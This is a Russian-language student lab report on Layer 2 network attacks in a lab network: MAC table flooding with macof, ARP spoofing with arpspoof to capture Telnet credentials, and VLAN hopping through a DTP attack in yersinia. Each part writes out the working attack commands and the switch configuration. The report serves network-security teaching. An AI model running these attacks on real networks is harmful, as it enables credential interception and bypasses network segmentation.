# :memo: Практическая работа №2. L2. Основные атаки на L2
## :memo:Часть 1. Переполнение таблицы коммутации.
1.1 Установим на kali linux необходимую утилиту.
apt update

apt install dsniff -y

1.2 Включим атаку и через несколько секунд остановим её с помощью ctrl+c.
macof

1.3 Увидим, что таблица коммутации switch7 переполнена.

## :memo: Часть 2. Arp-Spoofing.
2.1 Установим на Win7 Telnet

2.2 Проверим, может ли win7 подключаться по telnet к switch7/


2.3 Настроим kali для атаки. Изменим параметры маршрутизации. Раскомментируем строку и сохраним файл.

2.4 Применим изменения.

2.5 Начнём атаку.
arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100

2.6 Обнаружили с помощью Wireshark в трафике TELNET аутентификационные данные пользователя.




## :memo: Часть 3. VLAN hopping
3.1 Поместим win10 в vlan10.
Switch7(config)#int e1/2
Switch7(config-if)#switchport mode access
Switch7(config-if)#no shutdown

3.2 Сконфигурируем trunk port на switch7.
Switch7(config)#int e0/0
Switch7(config-if)#switchport trunk encapsulation dot1q
Switch7(config-if)#switchport mode trunk

3.3 Настроим на роутере шлюз для vlan 10/
Router(config)#int e0/1.10
Router(config-subif)#encapsulation dot1q 10
Router(config-subif)#ip address 192.168.10.1 255.255.255.0

После этих настроек Kali и Win10 будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку VLAN hopping, чтобы получить доступ в рамках широковещательного домена из Kali до win10.

3.4 Установим yersinia.
apt install yersinia -y

3.5 Подготовим интерфейсы Kali и запустим yersinia.
root@kali:# modprobe 8021q
root@kali:# vconfig add eth0 10
root@kali:# ifconfig eth0.10 up
yersinia -G

3.6 Проведем атаку на протокол DTP.
Проделаем следующее: Launch attack -> DTP -> Enable trunking -> OK.
Результат выполнения представлен ниже.

Командой "show int e0/1 trunk" посмотрим настройки порта в switch7.
Было:

Стало:

Трафик Wireshark с порта e0/1 на switch7.
Трафик с vlan id 10 найден.
